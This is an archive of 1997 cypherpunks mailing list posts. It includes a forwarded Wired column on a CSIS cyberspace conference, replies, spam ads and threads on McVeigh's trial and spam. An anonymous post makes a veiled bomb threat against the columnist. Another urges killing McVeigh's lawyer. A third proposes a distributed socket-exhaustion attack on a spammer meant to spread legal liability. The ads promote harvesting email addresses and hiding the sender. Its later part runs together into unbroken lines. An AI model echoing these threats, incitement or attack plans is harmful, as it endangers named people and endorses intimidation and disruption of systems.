Subject:      Fwd:  ciadrugs] (fwd) The Great Whites Are Worried About the Net
To: CTRL at LISTSERV.AOL.COM

- ---------------------
Forwarded message:
From:   Rickie.A.Slater at Dartmouth.EDU (Rickie A. Slate)
Reply-to:       ciadrugs at mars.galstar.com (The ciadrugs mailing lis)
To:     ciadrugs at mars.galstar.com
Date: 97-08-15 10:24:31 EDT

This is slightly off topic to drugs but relevant to the impact the network
media (like mailing lists) is having on politics. A 2nd message by Katz will
follow.

- --- Forwarded Message  ---

From: HotWired
by Jon Katz
4 Aug 97

A letter arrived last week inviting me to a 2-day conference called "The
Information Revolution: Impact on the Foundations of National Power," to be
held 24-25 Sept. outside Chicago.

"On the threshold of the information age," reads the invitation from the
Washington-based Center for Strategic & International Studies, "many of the
traditional measures of national power appear under challenge."

This stood out immediately from the stack of junk mail piling up on my
kitchen table.

The CSIS is a powerhouse military/national-security think tank whose board
members are listed on its imposing letterhead and include Henry Kissinger,
Zbigniew Brzezinski, Sam Nunn, James R. Schlesinger, Brent Scowcroft, Harold
Brown, Carla A. Hills, and R. James Woolsey.

For those unfamiliar with these names, they include former national-security
advisors, secretaries of state, secretaries of defense, US senators, and
other cabinet secretaries. [And all current members of the Council on
Foreign Relations - except for Sam Nunn - according to *The Insiders:
Architects of the New World Order* (Poster)]

The ambitious focus of this conference, said the invitation, "will be to
examine the impact of the information revolution on economic,
knowledge-oriented, social, and cultural foundations of national power."

It seemed the foundation was offering to fly me and 45 others to Chicago,
and to provide hotel accommodations, meals, and transportation to the
foundation's private conference center.

Anyone who doubts that the digital age is sending shock waves through the
most powerful elements in American business, politics, and journalism ought
to read the panel topics, along with the guest list.

That I am on the list of "invitees" is both a shock and a mortification.

The overall context for the conference, the invitation explains, is the way
the information revolution is putting stress on the fundamentals of national
power. There's some "context," too, about the nature of social revolutions -
the eventual winners and losers.

For all our cyber-chatting, it's a shock to see these Great Whites preparing
to convene to talk so nakedly about national political power and the digital
culture, and even more of a shock to realize that many of our ravings -
about how rattled the power structure is by the liberation of so much
information - are actually truer than we even know.

This group will have five panels:

First, there's "Economic Might as an Element of National Power," to explore
how the task of generating robust economic resources for the citizenry and
government are being challenged by the forces of globalization and
internationalization. "How," asks the letter, "does the information
revolution affect a nation-state's ability to marshall and control its
economic resources in support of its leaders' and peoples' objectives?" And
"What are the working and theoretical models that promise the most success
in adjusting national economic power to the realities of the information
revolution?"

And you thought you were just downloading cool software or browsing neat new
sites.

The second panel topic, "Knowledge Acquisition as an Element of National
Power,"  addresses what $E3is the most effective mechanism for addressing the
task of strengthening national power through the cumulative acquisition of
knowledge by a nation-state$E2s citizens and institutions?$E4

Panel three is $E3Civic Dynamics as an Element of National Power.$E4

The description for this panel says the information revolution $E3has been
forecast to usher in a new age of mankind, fundamentally changing civic
structures and roles by impacting the nature of work, the bonding of groups
and individuals, and the role of the citizen.$E4

The description adds: $E3The societal transition results from the industrial
revolution was accompanied by a transition to a set of nation-state
mechanisms for domestic and international relations. Can we expect another
tectonic shift in civic structure and national mechanisms as a result of the
information revolution?$E4

Panel four addresses the subject of $E3Cultural Identify as an Element of
National Power.$E4

Culture has served to bind people across generations, says the brochure, but
the $E3information revolution delivers culture to any people at any place.
What is the future role of culture as a cohesive binding force between
peoples who are located and/or share a common interest? Can ethnocentric
culturalization withstand the homogenizing battering ram of the information
revolution? How do a people balance the enriching and eroding effects of the
information revolution on their own unique culture?$E4

The last panel is entitled $E3Rethinking National Power in an
Information-rich
World.$E4

The information revolution, says the CSIS, $E3appears, in at least some
cases,
to have fundamentally altered the state$E2s conception of, and ability to
exercise, national power. The rise of new, nonsovereign authorities and
global forces suggest that the traditional equation of national power will
continue to change; others, however, insist that classical conceptions of
power will remain valid, the information revolution causing only marginal
changes.$E4

Each panel, says the invitation, will be accompanied by an academic paper to
help $E3focus$E4 discussion.

Wow, I thought, while reading over the topics.

These people are disturbingly smart, if clunky panel-topic writers. They$E2ve
fully grasped what hasn$E2t yet occurred to William Bennet or The New York
Times or Bill Clinton or Al Gore - that the rise of the digital age has
little to do with pornography, stolen term papers, or email-addicted
students. It has to do with raw power - who gets, defines, and controls it,
and for what purpose.

The CS
IS board cares much about this.

Its members comprise a blue-ribbon list of what used to be called the
military-industrial complex. That it would convene all these interested
parties, fly them to Chicago from all over the country and world, and stuff
them with canapes (and entertainment and museum tours) at great expense is a
striking affirmation of how seriously the Net and the Web are being taken in
the real corridors of power.

This letter read not so much like an invitation to talk abut the Net but an
X-Files script mailed to the wrong address. I expect Cigarette Man will be
sitting in the rear of the conference center, leering, puffing away, and
smiling wryly at the attendee$E2s naive notions of how power really works.

I won$E2t be there, though. In my next column, I$E2ll explain why and share
the
list of other $E3invitees.$E4

- -----------------------------------------------------
This article appeared originally in HotWired
Copyright 1993-97 Wired Ventures, Inc. and Affiliated Companies. All rights
reserved.


- ---
For list service help, send a message to ciadrugs-request at mars.galstar.com
with a subject of HELP.

------- End of Forwarded Message






From whgiii at amaranth.com  Fri Aug 15 21:50:12 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sat, 16 Aug 1997 12:50:12 +0800
Subject: None
In-Reply-To: 
Message-ID: <199708160435.XAA23333@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/16/97 
   at 04:05 AM, bureau42 Anonymous Remailer 
said:

>bureau42 Anonymous Remailer wrote:
>> 
>> Everyone's so fond of promoting the RC5 effort run by distributed.net.  Why
>> aren't more people using the Cyberian software from cyberian.org?  The
>> clients are faster, and instead of blowing the money on Project Gutenberg - a
>> dubious cause, to be sure - a healthy chunk goes right to the winner.
>> 
>> RC5Monger (aka GreedMonger)

>  If these people don't even know how to spell "Siberian" then why should
>we trust their math skills?
>  Not that I'm a troublemaker...

>TroubleMakerMonger

What does one's spelling have to do with one's math skills???

LogicMonger

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/Ugoo9Co1n+aLhhAQFkggP7BDbIsmxc2r9CdSvYiuCjNep8aMlChLx+
BhAzEcVEVKBihtl1kQ+iZPZfqbE4MEQBq9VsjYLpXRg9Ev8d8OazQGzKyiySr80P
kLTLWuEoCC1wDMpkBBiyxXe45OqYg+tbBnN0kVkBglt7jR7qatmYmcpB/tU54vH0
cjxSekIA34w=
=FJkv
-----END PGP SIGNATURE-----






From tcmay at got.net  Sat Aug 16 00:08:37 1997
From: tcmay at got.net (Tim May)
Date: Sat, 16 Aug 1997 15:08:37 +0800
Subject: Katz, Wired, and Clueless Conferences on Cyberspace
In-Reply-To: <199708160433.VAA05010@netcom13.netcom.com>
Message-ID: 




It seems that Jon Katz of "HotWired" (TM), or "Wired" (TM), or whatever, is
mightily impressed that he was invited to meet some bigwigs in Chicago to
chart the future of cyberspace.

Well, BFD. These conferences, populated by Carter, Reagan, Bush, and maybe
even Clinton era functionaries, are the conference equivalent of the rubber
chicken circuit. I mean, what _else_ are Al Haig and Zbigniew Brezinski
supposed to do? A while back it was "infrastructure," then it was "the end
of Communism," then it was "the rise of Islamic fundamentalism," and now
it's "cyberspace." Gotta keep up with what's hip, what's cool, what's
"relevant" (as my generation used to say).

And this is not just sour grapes on my part for not having been invited to
this shindig with Al and Zbig and Esther and the other policy wonks....

See, I _think_ I was invited to one of these things, put on by CSIS, two or
three years ago. I shined them on (street talk for "I declined"), as it was
pretty obviously just a bunch of old farts opining about things they knew
little of, with no willingness to be shaken out of their corporate-military
outlook.

(Hey, I could be wrong about the thing I was invited to being put on by the
CSIS. I was active on the Cyberia-l list at the time, and I recall the
conference being in the midwest somewhere, with a bunch of typical
McNeil-Lehrer (no longer McNeil) talking heads and a sprinkling of familiar
names from CFP and related conferences. I was contacted at least twice
about attending various such conferences, and I recall one of them being
sponsored by the CSIS. Needless to say, I declined.)

Think of these conferences as "CFP for the less clued." Considering how
boring and worthless CFP is, high praise indeed.

Comments on Katz's article follow:

At 9:33 PM -0700 8/15/97, Vladimir Z. Nuri wrote:
>------- Forwarded Message
>- --- Forwarded Message  ---
>
>From: HotWired
>by Jon Katz
>4 Aug 97
>
>A letter arrived last week inviting me to a 2-day conference called "The
>Information Revolution: Impact on the Foundations of National Power," to be
>held 24-25 Sept. outside Chicago.
>
>"On the threshold of the information age," reads the invitation from the
>Washington-based Center for Strategic & International Studies, "many of the
>traditional measures of national power appear under challenge."
...
>That I am on the list of "invitees" is both a shock and a mortification.

Yeah, it mortifies me, too. But it doesn't shock me...after all, any
cyberspace conference needs at least one "Wired" staffer to give it "street
cred" (or whatever the whippersnappers call it).

As we saw recently, in Japan the future of surveillance is determined with
the help of hipcrime vocab pseudo-journalists like Joichi Ito.  Kind of
like hiring Nickie Halflinger to develop anti-hacking policies.

>For all our cyber-chatting, it's a shock to see these Great Whites preparing
>to convene to talk so nakedly about national political power and the digital

Ah, the "Wired" invocation of "Great Whites." At least Katz didn't call
them "dead white males."


>This group will have five panels:
>
>First, there's "Economic Might as an Element of National Power," to explore
...
>The second panel topic, "Knowledge Acquisition as an Element of National
...
>Panel three is $E3Civic Dynamics as an Element of National Power.$E4
...
>Panel four addresses the subject of $E3Cultural Identify as an Element of
>National Power.$E4
....
>The last panel is entitled $E3Rethinking National Power in an
>Information-rich
>World.$E4

As the prototypical "Wired" reader would doubtless say, "B-o-o-o-r-i-n--g!!!!!"

>Wow, I thought, while reading over the topics.

Wow! Like, I mean, this dude is, like, easily impressed. Know what I mean?

>These people are disturbingly smart, if clunky panel-topic writers. They$E2ve
>fully grasped what hasn$E2t yet occurred to William Bennet or The New York
>Times or Bill Clinton or Al Gore - that the rise of the digital age has
>little to do with pornography, stolen term papers, or email-addicted
>students. It has to do with raw power - who gets, defines, and controls it,
>and for what purpose.

Sounds like something out of "Wired."

Remind me again never to buy this magazine.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From whgiii at amaranth.com  Sat Aug 16 00:26:45 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sat, 16 Aug 1997 15:26:45 +0800
Subject: Katz, Wired, and Clueless Conferences on Cyberspace
In-Reply-To: 
Message-ID: <199708160724.CAA24957@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/16/97 
   at 12:07 AM, Tim May  said:

>Sounds like something out of "Wired."

>Remind me again never to buy this magazine.

I bought one or two when it first came out. Too many adds for my liking (I
think 25% of the rag was glitzy adds aimed at Gen-Z crowd). I'll
occassionally flip through one when I am killing time at the coffee shop.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/VIBI9Co1n+aLhhAQF10gP/XV74ihx6Hvk12b+8OyWRKni1UWtrQBBg
IRNAN3FrGql5EEitHz474W3oYL6CX365cNLK8HdXfTf2t5WnJm0v2Sah/OyeBRUh
x3zWUkhVCmxO7zp9vYGpGteliQaGUMDXd2RYqTh8XTczzUZ6JCd/anHo8YKQTo7s
BE9pVMno93I=
=yGir
-----END PGP SIGNATURE-----






From 1848_tsr at rapidd.com  Sat Aug 16 17:52:39 1997
From: 1848_tsr at rapidd.com (1848_tsr at rapidd.com)
Date: Sat, 16 Aug 1997 17:52:39 -0700 (PDT)
Subject: Complete Bulk Email Pkg. ONLY $49.95
Message-ID: <199708170049.UAA24403@mail5.voicenet.com>


                  
                     *********************SUMMER PROMOTION******************

Complete Bulk Email Package inluding 25 Million Email Addresses only $49.95

Email Blaster ranks up with all the other bulk email software such as Floodgate,
Email Magnet, Netcontact, Extractor Pro. etc at hundreds of dollars less!!!

Why pay $399 just for a bulk email software, when you can pay
$49.95 including email addresses???

HOW DOES E-MAIL BLASTER WORK?  E-Mail Blaster has dozens of special filters 
to automatically harvest E-mail addresses from major online services such as: 
America OnLine, Compuserve,Delphi, Genie, and of course the internet and will
email your marketing letter to 13k consumers per hour at the single push of a 
button!!!  

SPECIAL CLOAKING DEVICE: Email Blaster can successfully hide your email address.
This will help stop users from flaming your email box! 


SIMPLE TO USE:  E-Mail Blaster does all the work for you and, unlike other
E-mail programs, with E-Mail Blaster there is no need to purchase any 
additional software.

NO SPECIAL EQUIPMENT NEEDED: E-Mail Blastert runs on a PC with Windows
3.xx Windows 95, Windows NT, a 386 or faster processor, 4 MB RAM, and a 
hard drive with at least 10 MB free and your own SLIP or PPP connetion.  No
other software needed.  Also runs on a Macintosh with SoftWindows installed

    
                       Plus....
You can become a distributor of Email Blaster for only $99 and you receive
5 Complete Email Blaster packages. 

Let's say you resell Email Blaster package at a discount of $199 each.
$199 x 5 packages = $995 CASH!!! Your potential is unlimited!

Price List
5 Packages: $99     10 Packages: $149       20 Packages      $299.
Larger quantity discounts are available upon request.

What are you waiting for start making money today SIGN UP NOW!!!
**********************************************************************************************************
 Don't miss out on this Summer Promotion!!! ORDER NOW!!!
Telephone: 609-933-3527 Fax: 609-933-1499



Name: _____________________________________________________


Address:____________________________________________________


City:___________________________________________


State:___________________________


Zip:_____________________________


Telephone::_____________________________________________


E-Mail Address:__________________________________________


Once we receive your order, you will receive a confirmation email, this
will  inform you of our website for you to go download your package immediately!
----------------------------------------------------------------------------------------------------------------------------------
"COMPLETE EMAIL BLASTER PACKAGE" only $49.95 ________

1 Copy of Email Blaster 

1 Electronic Help System: Email Blaster Help System will provide you with step
by step directions on how to use Email Blaster and help with setting up your provider.
For your convience this is built right into your copy of Email Blaster.

Unlimited Email Addresses: 25 Million And Growing
 You can download these addresses right from our website at your convenience.


-----------------------------------------------------------------------------------------------------------------------------------------
5 DISTRIBUTOR PACKAGE only $99: _________
This is a Special Promotion to new distributors only!!!


5 Copies of Email Blaster 

5  Built in Electronic Help Systems:

5 Unlimited Email Addresses: 25 Million And Growing
Our Email Addresses are updated monthly.  You can download these addresses
right from our website at your convenience.

Now you can take advantage of Email Blaster Package and resell each 
package up to $299. each.  You make $1495


10  DISTRIBUTOR PACK  only $149. _______
Includes 10 Complete Packages of Email Blaster.
You can make up to  $2990.00

20 DISTRIBUTOR  PACK: ONLY $299 ________
Includes 20 Complete Packages of Email Blaster.
You can make up to  $5980.00

*************************************************************************************************
If you would like to pay by check, please make check payable to: Internet Marketing
mail to: PO Box 276 Bellmawr, NJ 08099 or  Fax to 1-609-933-1499 along with this order form.
If you are paying with a Fax Check please include an additional $3.00 for check processing fees.

Credit Card: _______________________________________________
Visa, Master Card and AMEX.

EXP. Date: _____________________


Total to be charged: $________________________



Signature:___________________________________________________________




























From nobody at REPLAY.COM  Sat Aug 16 03:04:15 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 16 Aug 1997 18:04:15 +0800
Subject: state power in cyberspace convention
Message-ID: <199708160953.LAA04010@basement.replay.com>



Bladder Z. Neurotic wrote:

> From: HotWired
> by Jon Katz
> A letter arrived last week inviting me to a 2-day conference called "The
> Information Revolution: Impact on the Foundations of National Power," to be
> held 24-25 Sept. outside Chicago.
... 
> For those unfamiliar with these names, they include former national-security
> advisors, secretaries of state, secretaries of defense, US senators, and
> other cabinet secretaries.

> That I am on the list of "invitees" is both a shock and a mortification.
> I won't be there, though. 

Jon,
  I think you should go to the conference.
  As a matter of fact I have already prepared a package I would like you
to take along with you. It should be hand-carried on the plane so that
it will not be bumped about during your flight.
  Details to follow.

TruthBomber






From nobody at neva.org  Sat Aug 16 06:41:03 1997
From: nobody at neva.org (Neva Remailer)
Date: Sat, 16 Aug 1997 21:41:03 +0800
Subject: FCPUNX:McVeigh on McVeigh
Message-ID: <199708161327.IAA18154@dfw-ix3.ix.netcom.com>




James A. Donald wrote:
> He who pays controls.
> If someone is charged with a politically sensitive crime, and he has
> a court appointed attorney, then he has two prosecutors and no
> defense.
> 
> Very likely Mcviegh is guilty, but I could have defended him
> better, and so could my dog.

  Amen!!!
  More money was spent on McVeigh's defense than on O.J.'s prosecution.
For fifteen million dollars, McVeigh's lawyer couldn't be troubled to
raise his voice in his client's defense.

  I'm not Lee Fucking Bailey, but I've defended myself successfully in
court on a variety of occassions after firing attorneys who charged me
big bucks to advise me to plead out charges I was not guilty of
committing.
  There are a handful of lawyers I respect as having the skill and the
integrity to properly defend me to the max, but I wouldn't give you two
cents for McVeigh's government-bought schill.

  McVeigh's conviction was a given, no matter how skilled an attorney
he had representing him. That's how it works at that level.
  The role of McVeigh's attorney was to placate the American people's
sense of "justice" without rocking the boat. He didn't upset the
American people, he didn't upset the judge, the prosecutor, his golfing
buddies, or the court house restroom attendant.
  He did upset me, however, and that might turn out to be a big mistake
on his part.







From dlv at bwalk.dm.com  Sat Aug 16 07:07:46 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Aug 1997 22:07:46 +0800
Subject: 'Friendly Fire' in Spam War Claims Victim
In-Reply-To: <3.0.3.32.19970815194246.007b0e40@caprica.com>
Message-ID: 



> >I have seen little evidence that Scientologists have incorrect notions
> >regarding accounting.
> >Truth telling is another matter.
> >For Shiva's sake do not sue the Scientologists!
>
> Earthlink folk are Scientoz?  If so, didn't know that.

Sky Dayton and a bunch of other top managemnt are Co$ members.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From ThePres at bonghits.com  Sun Aug 17 00:58:45 1997
From: ThePres at bonghits.com (ThePres at bonghits.com)
Date: Sun, 17 Aug 1997 00:58:45 -0700 (PDT)
Subject: Presidential Joke on The Tonight Show
Message-ID: <647354695493.PUP89934@bonghits.com>


Subject: Presidential Joke, as seen on The Tonight Show with Jay Leno!

You've seen or heard the commercial, "Hooked on Phonics, it 
worked for me, ABCDEFG" right?

Well, check out this Award-Winning Presidential T-Shirt, VOTED 
the Funniest Presidential T-Shirt of ALL TIME!

It has a Big Full-Color graphic on the back of The President 
in a Tux, playing his Saxaphone, with musical notes Flying 
out of it.  

But what's that I see?!?  No way!!!  There are big Smoke Rings 
Flying out of his Sax! ...and The President is saying,

                 HOOKED ON BONG HITS
                  IT WORKED FOR ME!

The exclamation point is actually a Burning Joint!

On the front of the T-Shirt is a small chest print with 
children's blocks colored in Every Color of the Rainbow, 
just like the ABCDEFG blocks in the commercial... only they 
say "THCYA", as in THC 'YA or SEE 'YA LATER!  

Underneath the blocks are the words "INHALE TO THE CHIEF" 
hovering atop another Joint! 

The Hooked On Bong Hits T-Shirt was hand silk-screened in the 
U.S.A. on the finest quality Fruit of the Loom(tm) 100% Cotton 
Heavy-Weight Tee and was previously available at Woodstock '94, 
Grateful Dead shows, Newbury Comics and numerous Smoke, Joke, 
and T-Shirt shops across the United States for $24.95 + local 
sales tax, but they sold ALL they had left!  

You can't find these One of a KIND T-Shirts in stores anymore.  
Now, for a limited time only, you can buy one HOOKED ON BONG 
T-shirt Factory Direct for $15.95 or TWO for ONLY $24.95!  
Sorry, but due to the HIGH demand for these T-Shirts, your 
order is limited to only TWO, so you MUST respond NOW, BEFORE 
supplies run out!  

Don't miss out on this FINAL OPPORTUNITY to own the hottest 
selling T-Shirt in History!  It's the perfect gift for Mom or 
Dad, brother or sister, a friend, your political enemy, your 
neighbor, your co-worker, your boyfriend or girlfriend (the 
XLarge makes a great Night Shirt).  Send one to the Mayor, 
Rush Limbaugh, Bob Dole or the President HIMSELF!  Take a 
picture of his facial expression when he sees it and send 
it to us or Jay Leno!  We'll put it up on the web for FREE!

Don't wait 'til it's TOO LATE!  Your order must be postmarked 
by August 25, 1997!  Simply print the following order coupon, 
fill it out, and send it with your check or money order.  
Please make Cashiers Check, Money Order, or Personal Check 
in US dollars payable to: E-Associates, Inc. and send to:


E-Associates, Inc.
306 Thayer St., Dept. 129
Providence, RI 02906
USA

--------------------------------------------------------------

E-mail Address_____________________________________________

Name_______________________________________________________

Address____________________________________________________

Address____________________________________________________

Phone #____________________(in case address is illegible, not required)

$_______  Please send ONE Hooked On Bong Hits T-Shirt for only  $15.95 ___
$_______  Please send TWO Hooked On Bong Hits T-Shirts for ONLY $24.95 ___
$_3.95__  Shipping & Handling US PRIORITY MAIL(yes, it's the same for TWO!)
$_______  International Orders (Please add an additional $4.00)
$_______  Subtotal
$_______  Sales Tax (RI residents 7.00%)
$_______  Order total US$

T-Shirt Size Preference:

____S  ____M  ____L  ____XL
--------------------------------------------------------------

Please allow 1-2 weeks for delivery when paying by Cashiers Check or 
Money Order.  Please allow 2-3 weeks for delivery when paying by Personal 
Check.

The Tonight Show with Jay Leno is a Trademark of Jay Leno Productions.





From declan at pathfinder.com  Sat Aug 16 10:09:48 1997
From: declan at pathfinder.com (Declan McCullagh)
Date: Sun, 17 Aug 1997 01:09:48 +0800
Subject: state power in cyberspace convention
In-Reply-To: <199708160953.LAA04010@basement.replay.com>
Message-ID: 



This isn't the first such conference. I went to a "Virtual Diplomacy" conf
a few months ago sponsored by a USG-affiliated (or funded) entity, at same
the Connecticut Ave hotel where the Presidential Inaugural Ball was held. 

In attendence were many ambassadors, generals, and assorted Foggy Bottom
bureaucrats. (Aside from the campaign trail, I've never before seen so
many security men in one place before.) And the topics were the same...

-Declan




On Sat, 16 Aug 1997, Anonymous wrote:

> Bladder Z. Neurotic wrote:
> 
> > From: HotWired
> > by Jon Katz
> > A letter arrived last week inviting me to a 2-day conference called "The
> > Information Revolution: Impact on the Foundations of National Power," to be
> > held 24-25 Sept. outside Chicago.
> ... 
> > For those unfamiliar with these names, they include former national-security
> > advisors, secretaries of state, secretaries of defense, US senators, and
> > other cabinet secretaries.
> 
> > That I am on the list of "invitees" is both a shock and a mortification.
> > I won't be there, though. 
> 
> Jon,
>   I think you should go to the conference.
>   As a matter of fact I have already prepared a package I would like you
> to take along with you. It should be hand-carried on the plane so that
> it will not be bumped about during your flight.
>   Details to follow.
> 
> TruthBomber
> 
> 






From mnorton at cavern.uark.edu  Sat Aug 16 10:46:19 1997
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Sun, 17 Aug 1997 01:46:19 +0800
Subject: Not enough phone competition? Answer: regulate more!
In-Reply-To: 
Message-ID: 



Regulate more?  Unaccustomed as I am to defending the FCC,
the proposal described below is to regulate *less*, not
more.  Leaving the introduction of local competition to 
state regulation isn't getting the job done, is the implicit
message in Hundt's speech--together with, "I wish the Eighth
Circuit had ignored the law and upheld our national pricing 
rules instead of enjoining them," and "There's gotta be some
way I can get out of SBC's home court in Wichita Falls, the
latest place they've sued me."

In other words, whatever its litigative motivation, what's
proposed is less regulation and fewer regulators, not more.
MacN

On Thu, 14 Aug 1997, Declan McCullagh wrote:

> By JEANNINE AVERSA

> Associated Press Writer

> WASHINGTON (AP) - Just 18 months after Congress deregulated the > communications industry, the nation's top telephone regulator asked > lawmakers Thursday for more tools to bring Americans local phone > competition. > "So far, scarcely any local competition has been delivered to > residential or business consumers," Federal Communications Commission > Chairman Reed Hundt said in a speech to the American Enterprise Institute. > "We have a major challenge to introduce competition in the local > telephone markets and that challenge is not yet being met," he said. > Hundt asked Congress to write into law provisions: > -Giving the FCC authority to set national pricing rules for those > seeking access to local phone networks. > -Requiring courts to defer to reasonable FCC judgments in disputes > over the telecommunications law. > -Consolidating appeals over the telecommunications law and FCC > rules before a single unspecified court. > -Creating a national policy to enforce the telecommunications law, > giving the FCC power to compensate injured parties. The FCC now can order > violators to stop breaking the law and fine offenders. > Congressional hearings into the slow pace of local phone > competition are slated for this fall. > Sen. John McCain, R-Ariz., chairman of the Commerce Committee that > oversees telecommunications policy, said when asked about the proposals, > "I do not think that giving the FCC more authority to regulate is the > answer." > [...] > > > From alexlh at xs4all.nl Sat Aug 16 13:35:53 1997 From: alexlh at xs4all.nl (Alex le Heux) Date: Sun, 17 Aug 1997 04:35:53 +0800 Subject: No Subject Message-ID: <3.0.2.32.19970816223237.007b0bb0@mail.xs4all.nl> From enoch at zipcon.net Sat Aug 16 14:37:32 1997 From: enoch at zipcon.net (Mike Duvos) Date: Sun, 17 Aug 1997 05:37:32 +0800 Subject: Picketing With Packets Message-ID: <19970816212754.10722.qmail@zipcon.net> I availed myself of some free home page enhancements on the Web yesterday, and all of a sudden, my SPAM has increased by at least an order of magnitude. Obviously, one or more of the sites I visited sold my email address to Mr. Spamford. I am now getting almost continuous Cyberpromo, EmailBlaster, and SubmitKing mailings as well as one from some female entrepreneur in Singapore who wants me to send her US$10 to email me obscene stories. (sigh) The time has come to make an example of Wallace Spamford, and to mount his stuffed carcass on the gates of the Internet as a warning to those who might be tempted to follow in his footsteps. The following was suggested to me by someone on IRC this morning, and I think it's a pretty nifty idea. We write a little Perl script that keeps exactly ONE AND ONLY ONE TCP connection open to each of Mr. Spamford's machines. Keeping a single TCP connection open to someone's box is unlikely to be illegal, and does not constitute a Denial of Service attack. Consider it the packet equivalent of a single person picketing. We publish the script, and encourage every Sysadmin who hates Mr. Spamford to run it. When thousands do so, he will be out of sockets, and consequently out of business. Consider this the packet equivalent of the UPS strike. We can make the scripts clever, and have them goose a wide variety of ports on Mr. Spamford's machines. He can, of course, devise a technical defense against this, but he does not have one installed at present, and it will shut him down for the time being, and give him sufficient time to ponder his evil ways. This also has the advantage of distributing the liability over thousands of individuals, a technique shown in the recent uunet UDP to render legal redress impractical. Anyone have any comments on this scheme, or anything even more insidious to suggest? -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From jmr at shopmiami.com Sat Aug 16 15:14:26 1997 From: jmr at shopmiami.com (Jim Ray) Date: Sun, 17 Aug 1997 06:14:26 +0800 Subject: Export rules Message-ID: <3.0.16.19970816175752.47bffd64@pop.gate.net> -----BEGIN PGP SIGNED MESSAGE----- At 02:05 AM 8/15/97 -0700, Bill Stewart wrote: ... >Well, Raph Levien applied for an export permit for the RSA-in-4-lines-of-PERL >shirt several years ago, and the export thugs stalled on it and never >responded positively or negatively, in spite of their publicly stated >policies that they "will" respond in some small number of days. ... I wonder if it's possible/practical to do a FOIA request on Raph's old permit request and why it didn't merit action. As I recall, he even sent them a couple of the shirts. Then the export thugs could never- respond to the FOIA request, I guess. Someday, the news media might even notice that it's an interesting (and humorous) story. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh. iQEPAwUBM/YiLzUhsGSn1j2pAQHXTwfQ4Iwltxah6RzMhQ7T0ttNejtpwLYMdX/R nqzHvgvB/OrOpElnX7BBSUlt3kj8Evj39EaRAKbvRcXU7YagmQaRbMrZW7MD5cdT gMNBujRqEiNezi6iF3obxlQb7ZUDaCdFEscGSVq1pWacAVtJkZWUvUeKsuIs1374 X0DgdXAVMmw20JjS1An0ME17IwDyUnVsWAhgijUQmlWUMeS6WZnvfOmzClEJWTGn N919pcLzyWmL0ZGfjo5c8i2+eWCgTfY/oMBPa2TwChqAOIDuip1O1v3vHWgFpoJ7 ffXmwXOTw2yWZO5b511jQ3TLgY9UmZXYuvljndsYi1zxPA== =uVHt -----END PGP SIGNATURE----- From mix at earth.wazoo.com Sat Aug 16 15:23:02 1997 From: mix at earth.wazoo.com (Wazoo MixMaster) Date: Sun, 17 Aug 1997 06:23:02 +0800 Subject: FCPUNX:McVeigh on McVeigh Message-ID: <199708161556.PAA17771@earth.wazoo.com> At 06:27 PM 8/15/97 -0800, you wrote: > Amen!!! > More money was spent on McVeigh's defense than on O.J.'s prosecution. >For fifteen million dollars, McVeigh's lawyer couldn't be troubled to >raise his voice in his client's defense. Funny thing is, if O.J. was, say, a bus-driver with food stamps, how long do you think *his* trial would be? Besides, McVeigh's trial wasn't about truth or justice. It was all about getting revenge, drawing blood, satisfying the bloodthirsty people of America. > There are a handful of lawyers I respect as having the skill and the >integrity to properly defend me to the max, but I wouldn't give you two >cents for McVeigh's government-bought schill. McVeigh's lawyer was probably influenced (read: leaned on) by government fascists, so that McVeigh would die. > The role of McVeigh's attorney was to placate the American people's >sense of "justice" without rocking the boat. He didn't upset the >American people, he didn't upset the judge, the prosecutor, his golfing >buddies, or the court house restroom attendant. Very different from say, Atticus Finch, in "To Kill a Mockingbird". He defended a black man, in a place and time very against that. While this government controlled dickless loser that was McVeighs lawyer, didn't prosecute like a man, because then he'd be blacklisted and treated like shit. > He did upset me, however, and that might turn out to be a big mistake >on his part. If anyone out in this world feels like bumping off McVeighs lawyer, please do so. We need less lawyers like him. From dlv at bwalk.dm.com Sat Aug 16 15:25:10 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 17 Aug 1997 06:25:10 +0800 Subject: Picketing With Packets In-Reply-To: <19970816212754.10722.qmail@zipcon.net> Message-ID: Mike Duvos writes: > I availed myself of some free home page enhancements on the Web > yesterday, and all of a sudden, my SPAM has increased by at least > an order of magnitude. Obviously, one or more of the sites I > visited sold my email address to Mr. Spamford. ... In all fairness, in addition to Stanford Wallace, there are several other spammers sending out junk e-mail. If you completely eliminate Stanford and his company, you will STILL get junk e-mail. Perhaps this will spark another round of a cypherpunk discussion of technical solutions to junk e-mail... I placed myself on a zillion "remove" lists. Now I no longer get any junk e-mail of interest (which I did on rare occasions), but still get at least once a day an MMF 